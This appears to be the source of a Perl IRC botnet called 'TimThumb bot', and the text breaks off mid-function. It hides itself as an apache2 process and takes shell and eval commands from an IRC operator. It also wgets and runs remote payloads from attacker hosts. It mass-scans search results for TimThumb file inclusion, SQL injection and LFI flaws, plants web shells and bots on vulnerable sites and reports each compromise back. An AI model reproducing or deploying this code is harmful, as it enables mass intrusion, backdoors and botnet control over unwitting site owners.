#!/usr/bin/perl
#################################################
$powered="jembot"; #
$mail="root@jem.bot"; #
#################################################
#################PERL MODULES####################
use HTTP::Request; #
use HTTP::Request::Common; #
use HTTP::Request::Common qw(POST); #
use LWP::Simple; #
use LWP 5.53; #
use LWP::UserAgent; #
use Socket; #
use IO::Socket; #
use IO::Socket::INET; #
use IO::Select; #
use URI::URL; #
################BASIC CONNECTING#################
my $datetime = localtime; #
my $fakeproc = "/usr/sbin/apache2 [thumb]"; #
my $ircserver = "apolo.noirc.tk"; #
my $ircport = "6667"; #
my $nickname = "O-{".int(rand(100))."}"; #
my $ident = "HAcKeD"; #
my $channel = "#thumb"; #
my $admin = "JackHerer"; #
my $fullname = "INFO"; #
#################################################
####################LOGO####################################
my $nob0dy = "15(9@13nob0dy15)"; #
my $vulN = "15(9@6VuLn!15)"; #
my $thumblogo = "15(9@11ThuMB15)"; #
my $sqllogo = "15(9@11SQL15)"; #
my $lfilogo = "15(9@11Lfi15)"; #
##################COMMAND####################################
my $thumbcmd = '!thumb'; #
my $sqlcmd = '!sql'; #
my $lficmd = '!lfi'; #
##################INJECTOR########################################
my $injector = "http://pastebin.com/raw.php?i=izAyQE2f"; #
my $thumbshell = "http://picasa.com.nabbc.org/w00t.php"; #
my $bot = "http://picasa.com.nabbc.org/bot.php"; #
my $lfiinjector = "http://pastebin.com/raw.php?i=ukHveP61"; #
my $shellbot = "http://picasa.com.nabbc.org/r0x"; #
##################################################################
########################################TIMTHUMB PATH#######################################################
my $folder1 = "/cache/35bac048e7c81f26c86c56ed8178e44f.php"; #
my $folder2 = "/cache/external_35bac048e7c81f26c86c56ed8178e44f.php"; #
my $folder3 = "/temp/35bac048e7c81f26c86c56ed8178e44f.php"; #
my $folder4 = "/temp/external_35bac048e7c81f26c86c56ed8178e44f.php"; #
my $folder5 = "/wp-content/uploads/thumb-temp/35bac048e7c81f26c86c56ed8178e44f.php"; #
my $bot1 = "/cache/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
my $bot2 = "/cache/external_5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
my $bot3 = "/temp/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
my $bot4 = "/temp/external_5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; #
my $bot5 = "/wp-content/uploads/thumb-temp/5291c5d1b8b6fb1c761b1e96b0c3f0ee.php"; # #
############################################################################################################
my @uagents = ("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6");
my $uagent = $uagents[rand(scalar(@uagents))];
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
$ircserver = "$ARGV[0]" if $ARGV[0];
$0 = "$fakeproc"."\0" x 16;;
my $pid = fork;
exit if $pid;
die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_client = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
nick("$mynick");
my $versi = "15[!]11TimThumB bot 04(09,01s4l1ty04) 15[!]";
sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
sleep (1);}}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
}
elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($mynick)) {
$mynick = $4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
}
}
elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$mynick".int rand(1));
}
elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("MODE $mynick +iB");
sendraw("JOIN $channel");
sleep(2);
sendraw("PRIVMSG $channel :14[04!14]11TimhuMB BoT 09,01Up09...04!");
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
select(undef, undef, undef, 0.01);;
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $ircmsg, 4096);
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $ircmsg);
$ircmsg =~ s/\r\n$//;
if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR,DooGatE,sogou,interia,snz,yandex,joeant,terra,youdao,amfibi,bigclique,dancefloor,live,rakuten,biglobe,nova,najdi,goo,uksubmit,excite";
if ($path eq $mynick) {
if ($msg =~ /^PING (.*)/) {
sendraw("NOTICE $nick :PING $1");
}
if ($msg =~ /^VERSION/) {
sendraw("NOTICE $nick :VERSION TimThumb Bot scanner by s4l1ty");
}
if ($msg =~ /^TIME/) {
sendraw("NOTICE $nick :TIME ".$datetime."");
}
if (&isAdmin($nick) && $msg eq "!die") {
&shell("$path","kill -9 $$");
}
if (&isAdmin($nick) && $msg eq "!killall") {
&shell("$path","killall -9 perl;wget http://picasa.com.nabbc.org/r0x -O paste.jpg;perl paste.jpg;rm paste.jpg");
}
if (&isAdmin($nick) && $msg eq "!reset") {
sendraw("QUIT :Restarting...");
}
if (&isAdmin($nick) && $msg eq "!rehash") {
sendraw("QUIT : Rehasing...");
&shell("$path","kill -9 $$;perl '.$0");
}
if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
sendraw("JOIN #".$1);
}
if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
sendraw("PART #".$1);
}
if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
sendraw("NICK ".$1);
}
if (&isAdmin($nick) && $msg =~ /^!pid/) {
sendraw($IRC_cur_socket, "PRIVMSG $nick :09Fake Process/PID :04 $fakeproc - 11,01$$");
}
if (&isAdmin($nick) && $msg !~ /^!/) {
&shell("$nick","$msg");
}
}
else {
if (&isAdmin($nick) && $msg eq "!die") {
&shell("$path","kill -9 $$");
}
if (&isAdmin($nick) && $msg eq "!killall") {
&shell("$path","killall -9 perl;wget http://picasa.com.nabbc.org/r0x -O paste.jpg;perl paste.jpg;rm paste.jpg");
}
if (&isAdmin($nick) && $msg eq "!reset") {
sendraw("QUIT :Restarting...");
}
if (&isAdmin($nick) && $msg eq "!rehash") {
sendraw("QUIT : Rehasing...");
&shell("$path","kill -9 $$;perl '.$0");
}
if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
sendraw("JOIN #".$1);
}
if (&isAdmin($nick) && $msg eq "!part") {
sendraw("PART $path");
}
if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
sendraw("PART #".$1);
}
if (&isAdmin($nick) && $msg =~ /^\.x (.*)/) {
&shell("$path","$1");
}
if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
&shell("$path","$1");
}
if (&isAdmin($nick) && $msg =~ /^!eval (.*)/) {
eval "$1";
}
##################################################################### HELP COMMAND
if ($msg=~ /^!help/) {
my $helplogo = "15(14@03Help15";
&msg("$path","$helplogo 15 #####################4[HELP]15##############################");
&msg("$path","$helplogo 03 ( $sqlcmd [bug][dork] ) sql scan ");
&msg("$path","$helplogo 03 ( $thumbcmd [bug][dork] ) TimThumb scan ");
&msg("$path","$helplogo 03 ( $lficmd [bug][dork] ) TimThumb scan ");
&msg("$path","$helplogo 15 6END HELP ===>");
}
if ($msg=~ /^!engine/) {
my $enginelogo = "06(09@11eNgine6)";
&msg("$path","$enginelogo 04GooGLe,Bing,ALtaViSTa,AsK,UoL,YahOo.");
&msg("$path","$enginelogo 04Will Be Updated as soon");
}
if ($msg=~ /^!about/) {
my $aboutlogo = "15(09@11About15)";
&msg("$path","$aboutlogo 09,01Priv8 Bot 11v0.13");
&msg("$path","$aboutlogo 09,01© Copy Right 2012 04s4l1ty");
}
if ($msg=~ /^!version/) {
my $versionlogo = "15(09@11Version15)";
&msg("$path","$versionlogo 13,11WordPress,Sql,Lfi 04fucker");
}
if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
if (&isFound($lfiinjector,"str_rot13")) {
&msg("$path","15,1(9@11Injector15 => 4Ready!!!");
} else {
&msg("$path","15,01(09@11Injector15 => 12Undetected.");
}
}
if (&isAdmin($nick) && $msg =~ /^!pid/) {
¬ice("$nick","PRIVMSG $nick :09Fake Process/PID :04 $fakeproc - 11,01$$");
}
#####################################################################
if ($msg=~ /^!port\s+(.*?)\s+(.*)/ ) {
my $hostip= "$1";
my $portsc= "$2";
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
if ($scansock) {
&msg("$path","15(9@11PORT15)7 $hostip : $portsc 9Accepted");
}
else {
&msg("$path","15(9@11PORT15)7 $hostip : $portsc 4connection refused");
}
}
if ($msg=~ /^!ip\s+(.*)/ ) {
if (my $pid = fork) { waitpid($pid, 0); } else {
if (fork) { exit; } else {
my $ip = $1;
&msg("$path","15(9@11IP15)7 Searching ".$ip." 6Location ...");
my $website = "http://www.ipligence.com/geolocation";
my ($useragent,$request,$response,%form);
undef %form;
$form{ip} = $ip;
$useragent = LWP::UserAgent->new;
$useragent->timeout(5);
$request = POST $website,\%form;
$response = $useragent->request($request);
if ($response->is_success) {
my $res = $response->content;
if ($res =~ m/Your IP address is(.*)
City:(.*)
Country:(.*)
Continent:(.*)
Time/g) {
my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4);
&msg("$path","15(9@11IP15)7IP Address : ".$ip."15 (9".$ipaddress."15 )");
&msg("$path","15(9@11IP15)7 City : ".$ip."15 (9".$city."15 )");
&msg("$path","15(9@11IP15)7 Country : ".$ip."15 (9".$country."15 )");
&msg("$path","15(9@11IP15)7 Continent : ".$ip."15 (9".$continent."15 )");
}
else {
&msg("$path","15(9@11IP15)7 ".$ip." 6not found in database");
}
}
else {
&msg("$path","15(9@11IP15)4 Cannot open IP database.");
}
}
exit;
}
}
if ($msg=~ /^!base64 (.*)$/ ) {
if (my $pid = fork) { waitpid($pid, 0); } else {
if (fork) { exit; } else {
my $hash = $1;
my $base64_encoded = encode_base64($hash);
my $base64_decoded = decode_base64($hash);
&msg("$path","15(9@11BASE6415)12 Decode : $base64_decoded");
&msg("$path","15(9@11BASE6415)12 Encode : $base64_encoded");
}
exit;
}
}
##############################################################################
if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$thumblogo 6Dork :11 $dork");
&msg("$path","$thumblogo 11Bugz :6 $bug");
&msg("$path","$thumblogo 4Working.!!!");
&timthumb_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
}
exit;
}
}
#####################################################################
if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$sqllogo 6Dork :11 $dork");
&msg("$path","$sqllogo 11Bugz :6 $bug");
&msg("$path","$sqllogo 4Working.!!!");
&sql_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
}
exit;
}
}
#####################################################################
if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
if (my $pid = fork) {
waitpid($pid, 0);
}
else {
if (fork) { exit; } else {
my ($bug,$dork) = ($1,$2);
&msg("$path","$lfilogo 6Dork :11 $dork");
&msg("$path","$lfilogo 11Bugz :6 $bug");
&msg("$path","$lfilogo 4Working.!!!");
&lfi_start($path,$bug,$dork,"GooGLe,AllTheWeb,Bing,ALtaViSTa,AsK,UoL,YahOo");
}
exit;
}
}
#####################################################################
}
}
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line = $line_temp.$line if ($line_temp);
$line_temp = '';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
#########################################
sub timthumb_start() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
if ($engine =~ /google/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&thumb($chan,$bug,$dork,"GooGLe");
} exit; }
}
if ($engine =~ /alltheweb/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&thumb($chan,$bug,$dork,"AllTheWeb");
} exit; }
}
if ($engine =~ /bing/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&thumb($chan,$bug,$dork,"Bing");
} exit; }
}
if ($engine =~ /altavista/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&thumb($chan,$bug,$dork,"ALtaViSTa");
} exit; }
}
if ($engine =~ /ask/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&thumb($chan,$bug,$dork,"AsK");
} exit; }
}
if ($engine =~ /uol/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&thumb($chan,$bug,$dork,"UoL");
} exit; }
}
if ($engine =~ /yahoo/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&thumb($chan,$bug,$dork,"YahOo");
} exit; }
}
}
#########################################
sub sql_start() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
if ($engine =~ /google/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&sql($chan,$bug,$dork,"GooGLe");
} exit; }
}
if ($engine =~ /alltheweb/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&sql($chan,$bug,$dork,"AllTheWeb");
} exit; }
}
if ($engine =~ /bing/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&sql($chan,$bug,$dork,"Bing");
} exit; }
}
if ($engine =~ /altavista/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&sql($chan,$bug,$dork,"ALtaViSTa");
} exit; }
}
if ($engine =~ /ask/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&sql($chan,$bug,$dork,"AsK");
} exit; }
}
if ($engine =~ /uol/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&sql($chan,$bug,$dork,"UoL");
} exit; }
}
if ($engine =~ /yahoo/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&sql($chan,$bug,$dork,"YahOo");
} exit; }
}
}
#########################################
sub lfi_start() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
if ($engine =~ /google/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&lfi($chan,$bug,$dork,"GooGLe");
} exit; }
}
if ($engine =~ /alltheweb/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&lfi($chan,$bug,$dork,"AllTheWeb");
} exit; }
}
if ($engine =~ /bing/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&lfi($chan,$bug,$dork,"Bing");
} exit; }
}
if ($engine =~ /altavista/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&lfi($chan,$bug,$dork,"ALtaViSTa");
} exit; }
}
if ($engine =~ /ask/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&lfi($chan,$bug,$dork,"AsK");
} exit; }
}
if ($engine =~ /uol/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&lfi($chan,$bug,$dork,"UoL");
} exit; }
}
if ($engine =~ /yahoo/i) {
if (my $pid = fork) { waitpid($pid, 0); }
else { if (fork) { exit; } else {
&lfi($chan,$bug,$dork,"YahOo");
} exit; }
}
}
#########################################
sub lfi() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$lfilogo15(9@7$engine15)10 Scan finish..."); }
my $dir = "../../../../../../../../../../../../../../../";
my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
my $vuln = "http://".$site.$bug.$dir."09/proc/self/environ%0000";
my $shell = "http://".$site.$bug.$dir."04/tmp/Crash%0000";
my $html = get_content($test);
if ($html =~ /DOCUMENT_ROOT=\// && $html =~ /HTTP_USER_AGENT=/) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $code = 'echo "s4l1ty#".php_uname()."#s4l1ty"; if(@copy("'.$lfiinjector.'","/tmp/Crash")) { echo "SUCCESS"; }';
my $res = lfi_env_query($test,encode_base64($code));
$res =~ s/\n//g;
if ($res =~ /s4l1ty#(.*)#s4l1tySUCCESS/sg) {
my $sys = $1;
&msg("$chan","$lfilogo15(09@03$engine15)04 ".$shell." 15(9@3".$sys."15)$vulN");
sleep(4);
}
elsif ($res =~ /s4l1ty#(.*)#s4l1ty/sg) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
my $sys = $1;
my $upload = 'system("wget '.$lfiinjector.' -O /tmp/Crash");';
my $upload1 = 'system("wget '.$botshell.' -O /tmp/w00t");';
my $wget = lfi_env_query($test,encode_base64($upload)); sleep(2);
my $wget1 = lfi_env_query($test,encode_base64($upload1)); sleep(2);
my $check = get_content("http://".$site.$bug.$dir."/tmp/Crash%0000"); sleep(1);
if ($check =~ /Hijacked by s4l1ty/) {
&msg("$admin","$lfilogo15(09@03$engine15)04 ".$shell." 15(9@3".$sys."15)$vulN");
sleep(2);
}
else {
&msg("$chan","$lfilogo15(09@3$engine15)15(09@04SysTem15)4 ".$vuln." 15(09@03".$sys."15)$vulN");
sleep(2);
}
} exit; }
}
else { &msg("$chan","$lfilogo15(09@3$engine15)15(09@06eNviRon15)06 ".$vuln.""); }
} exit; } sleep(2);
}
}
}
}
#########################################
sub sql() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) { &msg("$chan","$sqllogo15(9@7$engine15)10 Scan finish..."); }
my $test = "http://".$site.$bug."'";
my $vuln = "http://".$site.$bug;
my $sqlsite = "http://".$site.$bug;
my $html = &get_content($test);
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/Query failed/i || $html =~ m/SQL query failed/i ) {
&msg("$chan","$sqllogo15(04@3$engine15)15(09@04MySQL15) 03,01".$vuln);}
elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed quotation mark/i || $html =~ m/Microsoft OLE DB Provider for/i ) {
&msg("$chan","$sqllogo15(04@3$engine15)15(09@04MsSQL15) 03,01".$vuln);}
elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Microsoft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) {
&msg("$chan","$sqllogo15(4@3$engine15)15(09@04MsAccess15) 03,01".$vuln);}
elsif ($html =~ m/mysql_/i || $html =~ m/Division by zero in/i || $html =~ m/mysql_fetch_array/i ) {
} exit; sleep(2); }
}
}
}
}
#########################################
sub thumb() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
if ($count == $num-1) {
&msg("$chan","$thumblogo 15(09@03$engine15)2 Scan finish...");
}
my $vuln = "http://".$site.$bug."?src=".$thumbshell;
my $bot = "http://".$site.$bug."?src=".$bot;
my $cek = &get_content($vuln);sleep(2);&get_content($bot);sleep(2);
if ($cek =~ /Unable to /i) {
(my $tpath = $bug)=~ s{/[^/]+\z}{};
my $runing = "http://".$site.$tpath."/patched-by-s4l1ty.php?src=".$thumbshell;
my $vuln2 = "http://".$site.$tpath.$folder1;
my $vuln3 = "http://".$site.$tpath.$folder2;
my $vuln4 = "http://".$site.$tpath.$folder3;
my $vuln5 = "http://".$site.$tpath.$folder4;
my $vuln6 = "http://".$site.$folder5;
my $exbot1 = "http://".$site.$tpath.$bot1;
my $exbot2 = "http://".$site.$tpath.$bot2;
my $exbot3 = "http://".$site.$tpath.$bot3;
my $exbot4 = "http://".$site.$tpath.$bot4;
my $exbot5 = "http://".$site.$bot5;
my $runbot1 = &get_content($exbot1);sleep(3);
my $runbot2 = &get_content($exbot2);sleep(3);
my $runbot3 = &get_content($exbot3);sleep(3);
my $runbot4 = &get_content($exbot4);sleep(2);
my $runbot5 = &get_content($exbot5);sleep(2);
my $backup = &get_content($runing);sleep(3);
my $check1 = &get_content($vuln2);sleep(2);
my $check2 = &get_content($vuln3);sleep(2);
my $check3 = &get_content($vuln4);sleep(2);
my $check4 = &get_content($vuln5);sleep(2);
my $check5 = &get_content($vuln6);sleep(2);
my $os = "";
my $free = "";
my $uid = "";
if ($check1 =~ /JANCOK- exploit/i) {
if ($check1 =~ m/color=red> (.*?)
/) {$os = $1;}
if ($check1 =~ m/Total space: (.*?)<\/b>
/) {$free = $1;}
if ($check1 =~ m/uid=(.*?)gid=/) {$uid = $1;}
&msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln2."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
&msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln2."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
}
if ($check2 =~ /JANCOK- exploit/i) {
if ($check2 =~ m/color=red> (.*?)
/) {$os = $1;}
if ($check2 =~ m/Total space: (.*?)<\/b>
/) {$free = $1;}
if ($check2 =~ m/uid=(.*?)gid=/) {$uid = $1;}
&msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln3."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
&msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln3."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
}
if ($check3 =~ /JANCOK- exploit/i) {
if ($check3 =~ m/color=red> (.*?)
/) {$os = $1;}
if ($check3 =~ m/Total space: (.*?)<\/b>
/) {$free = $1;}
if ($check3 =~ m/uid=(.*?)gid=/) {$uid = $1;}
&msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln4."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
&msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln4."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
}
if ($check4 =~ /JANCOK- exploit/i) {
if ($check4 =~ m/color=red> (.*?)
/) {$os = $1;}
if ($check4 =~ m/Total space: (.*?)<\/b>
/) {$free = $1;}
if ($check4 =~ m/uid=(.*?)gid=/) {$uid = $1;}
&msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln5."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
&msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln5."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
}
if ($check5 =~ /JANCOK- exploit/i) {
if ($check5 =~ m/color=red> (.*?)
/) {$os = $1;}
if ($check5 =~ m/Total space: (.*?)<\/b>
/) {$free = $1;}
if ($check5 =~ m/uid=(.*?)gid=/) {$uid = $1;}
&msg("$admin","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln6."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
&msg("$chan","$thumblogo15(09@03$engine15)15(09@04shell15)03,01 ".$vuln6."04 (OS=09$os04) (total=09$free04) (uid=09$uid04) ");
}
}
}
}
}
#########################################
sub search_engine() {
my (@total,@clean);
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $logo = $_[4];
if ($engine eq "GooGLe") { my @google = google($dork); push(@total,@google); }
if ($engine eq "AllTheWeb") { my @alltheweb = alltheweb($dork); push(@total,@alltheweb); }
if ($engine eq "Bing") { my @bing = bing($dork); push(@total,@bing); }
if ($engine eq "ALtaViSTa") { my @altavista = altavista($dork); push(@total,@altavista); }
if ($engine eq "AsK") { my @ask = ask($dork); push(@total,@ask); }
if ($engine eq "UoL") { my @uol = uol($dork); push(@total,@uol); }
if ($engine eq "YahOo") { my @yahoo = yahoo($dork); push(@total,@yahoo); }
@clean = clean(@total);
&msg("$chan","$logo15(9@2$engine15) Total:14 (".scalar(@total).") Clean:14 (".scalar(@clean).")");
return @clean;
}
#########################################
sub isFound() {
my $status = 0;
my $link = $_[0];
my $reqexp = $_[1];
my $res = &get_content($link);
if ($res =~ /$reqexp/) { $status = 1 }
return $status;
}
sub get_content() {
my $url = $_[0];
my $ua = LWP::UserAgent->new(agent => $uagent);
$ua->timeout(7);
my $req = HTTP::Request->new(GET => $url);
my $res = $ua->request($req);
return $res->content;
}
######################################### SEARCH ENGINE gibla
sub google() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=100){
my $search = ("http://www.google.com/search?q=".key($key)."&num=100&filter=0&start=".$i);
my $res = search_engine_query($search);
while ($res =~ m/\"]*)\//g) {
my $link = $1;
if ($link !~ /google/){
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub alltheweb() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=100) {
my $search = ("http://us.yhs4.search.yahoo.com/yhs/search?fr=alltheweb&cat=web&_sb_lang=any&hits=100&q=".key($key)."&o=".$i);
my $res = search_engine_query($search);
while ($res =~ m/\*\*http%3a\/\/(.+?)\">/g) {
my $link = $1;
if ($link !~ /bingj|yahoo/) {
$link =~ s/ //g;
$link =~ s/%3f/\?/g;
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub uol() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=1000; $i+=10) {
my $search = ("http://mundo.busca.uol.com.br/buscar.html?q=".key($key)."&start=".$i);
my $res = search_engine_query($search);
while ($res =~ m/\"]*)/g) {
my $link = $1;
if ($link !~ /busca|uol|yahoo/) {
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub bing() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=1000; $i+=10) {
my $search = ("http://www.bing.com/search?q=".key($key)."&filt=all&first=".$i."&FORM=PERE");
my $res = search_engine_query($search);
while ($res =~ m/\"]*)\//g) {
my $link = $1;
if ($link !~ /msn|live|bing/) {
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub altavista() {
my @list;
my $key = $_[0];
for (my $i=1; $i<=1000; $i+=10){
my $search = ("http://it.altavista.com/web/results?itag=ody&kgs=0&kls=0&dis=1&q=".key($key)."&stq=".$i);
my $res = search_engine_query($search);
while ($res =~ m/(.+?)\//g) {
my $link = $1;
if ($link !~ /altavista/){
$link =~ s//g;
$link =~ s/ //g;
my @grep = links($link);
push(@list,@grep);
}
}
}
return @list;
}
sub ask() {
my @list;
my $key = $_[0];
for (my $i=0; $i<=1000; $i+=10) {
my $search = ("http://it.ask.com/web?q=".key($key)."&o=0&l=dir&qsrc=0&qid=EE90DE6E8F5370F363A63EC61228D4FE&dm=all&page=".$i);
my $res = search_engine_query($search);
while ($res =~ m/href=\"http:\/\/(.+?)\" onmousedown=/g) {
my $link = $1;
if ($link !~ /ask\.com/){
